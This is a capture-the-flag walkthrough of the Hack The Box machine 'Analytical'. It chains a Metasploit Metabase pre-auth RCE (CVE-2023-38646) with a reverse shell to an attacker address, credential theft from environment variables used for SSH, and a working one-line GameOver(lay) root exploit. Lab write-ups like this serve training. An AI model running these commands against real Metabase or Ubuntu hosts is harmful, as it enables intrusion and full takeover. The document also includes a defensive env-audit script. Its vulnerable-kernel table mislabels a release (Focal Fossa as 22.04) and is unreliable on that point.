Information Gathering

sudo nmap -p- --min-rate 10000 10.10.11.233
[sudo] kali 的密码:
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-01 13:44 CST
Nmap scan report for analytical.htb (10.10.11.233)
Host is up (0.12s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 7.20 seconds

/etc/hosts

10.10.11.233 analytical.htb
10.10.11.233 data.analytical.htb

user-metabase

Metabase has a recently disclosed pre-authentication RCE vulnerability: CVE-2023-38646.

Open-source versions before 0.46.6.1 and enterprise versions before 1.46.6.1 are affected.

/api/session/properties (reachable without authentication) leaks the setup-token.

I just used msf here:

┌──(kali㉿kali)-[~]
└─$ msfconsole

msf6 > search metabase

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/http/metabase_setup_token_rce 2023-07-22 excellent Yes Metabase Setup Token RCE


Interact with a module by name or index. For example info 0, use 0 or use exploit/linux/http/metabase_setup_token_rce

msf6 > use 0
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(linux/http/metabase_setup_token_rce) > set rhost http://data.analytical.htb/
rhost => http://data.analytical.htb/
msf6 exploit(linux/http/metabase_setup_token_rce) > set lhost 10.10.16.5
lhost => 10.10.16.5
msf6 exploit(linux/http/metabase_setup_token_rce) > set rport 80
rport => 80
msf6 exploit(linux/http/metabase_setup_token_rce) > run

[*] Started reverse TCP handler on 10.10.16.5:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version Detected: 0.46.6
[+] Found setup token: 249fa03d-fd94-4d5b-b94f-b4ebf3df681f
[*] Sending exploit (may take a few seconds)
[*] Command shell session 1 opened (10.10.16.5:4444 -> 10.10.11.233:49520) at 2024-01-01 13:49:23 +0800

whoami
metabase

user-metalytics

The sensitive information is hidden fairly deep; it turns out to be sitting in the environment variables:

env
MB_LDAP_BIND_DN=
LANGUAGE=en_US:en
USER=metabase
HOSTNAME=f119c1f252f8
FC_LANG=en-US
SHLVL=5
LD_LIBRARY_PATH=/opt/java/openjdk/lib/server:/opt/java/openjdk/lib:/opt/java/openjdk/../lib
HOME=/home/metabase
MB_EMAIL_SMTP_PASSWORD=
LC_CTYPE=en_US.UTF-8
JAVA_VERSION=jdk-11.0.19+7
LOGNAME=metabase
_=/bin/sh
MB_DB_CONNECTION_URI=
PATH=/opt/java/openjdk/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
MB_DB_PASS=
MB_JETTY_HOST=0.0.0.0
META_PASS=An4lytics_ds20223#
LANG=en_US.UTF-8
MB_LDAP_PASSWORD=
SHELL=/bin/sh
MB_EMAIL_SMTP_USERNAME=
MB_DB_USER=
META_USER=metalytics
LC_ALL=en_US.UTF-8
JAVA_HOME=/opt/java/openjdk
PWD=/
MB_DB_FILE=//metabase.db/metabase.db

In that output we find:

META_USER=metalytics
META_PASS=An4lytics_ds20223#
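As an added example (not from the original writeup), a small audit script that parses an `env` dump like the one above and reports variables whose values look like credentials, masking them before they are printed. The sample environment is constructed and modelled on the dump; the connection-URI value is made up to show the embedded user:password case.

```python
import re
from urllib.parse import urlsplit

# Variable names that commonly hold credentials (case-insensitive match).
SECRET_KEY_PATTERN = re.compile(r"(PASS|PASSWORD|SECRET|TOKEN|API_KEY|PRIVATE_KEY)", re.IGNORECASE)

# Constructed sample modelled on the env dump from the box (URI value is invented).
SAMPLE_ENV = """\
USER=metabase
MB_DB_PASS=
META_PASS=An4lytics_ds20223#
META_USER=metalytics
MB_EMAIL_SMTP_PASSWORD=
MB_DB_CONNECTION_URI=postgres://app:hunter2@db.internal:5432/metabase
PATH=/usr/bin:/bin
"""


def mask(value):
    """Keep the first two characters so a finding is recognisable, hide the rest."""
    return value[:2] + "*" * (len(value) - 2) if len(value) > 2 else "*" * len(value)


def parse_env(text):
    """Turn KEY=VALUE lines into a dict; lines without '=' are ignored."""
    env = {}
    for line in text.splitlines():
        if "=" in line:
            key, _, value = line.partition("=")
            env[key.strip()] = value
    return env


def find_exposed_secrets(text):
    """Return (name, masked_value) for every variable that appears to carry a credential."""
    findings = []
    for key, value in parse_env(text).items():
        if not value:
            continue  # an empty credential variable leaks nothing
        if SECRET_KEY_PATTERN.search(key):
            findings.append((key, mask(value)))
            continue
        # Connection strings can embed user:password@host even when the name does not say so.
        if "://" in value:
            parts = urlsplit(value)
            if parts.password:
                findings.append((key, value.replace(parts.password, mask(parts.password))))
    return findings


if __name__ == "__main__":
    for name, shown in find_exposed_secrets(SAMPLE_ENV):
        print(f"{name} looks like a credential: {shown}")
```

Run it against `env` output from a container or service account to see what a shell on that account would hand an attacker.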

SSH login succeeds:

ssh metalytics@10.10.11.233 
An4lytics_ds20223#

user-root

sudo -l offers nothing to exploit:

metalytics@analytics:~$ sudo -l
[sudo] password for metalytics:
Sorry, user metalytics may not run sudo on localhost.

No exploitable SUID binaries either:

metalytics@analytics:~$ find / -perm -4000 2>/dev/null
/var/tmp/bash
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/umount
/usr/bin/chsh
/usr/bin/fusermount3
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/mount
/usr/bin/chfn
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1

uname -a

Linux analytics 6.2.0-25-generic #25~22.04.2-Ubuntu SMP PREEMPT_DYNAMIC Wed Jun 28 09:55:23 UTC 2 x86_64 x86_64 x86_64 GNU/Linux

Using CVE-2023-2640 and CVE-2023-32629 to obtain root from a non-root container, a.k.a. GameOver(lay).

The payload is a single line:

unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;import pty;os.setuid(0);pty.spawn("/bin/bash")'

Vulnerable kernels

Kernel version    Ubuntu release
6.2.0             Ubuntu 23.04 (Lunar Lobster) / Ubuntu 22.04 LTS (Jammy Jellyfish)
5.19.0            Ubuntu 22.10 (Kinetic Kudu) / Ubuntu 22.04 LTS (Jammy Jellyfish)
5.4.0             Ubuntu 22.04 LTS (Focal Fossa) / Ubuntu 18.04 LTS (Bionic Beaver)

Summary

Patience, persistence, research and technical skill together got me to the goal.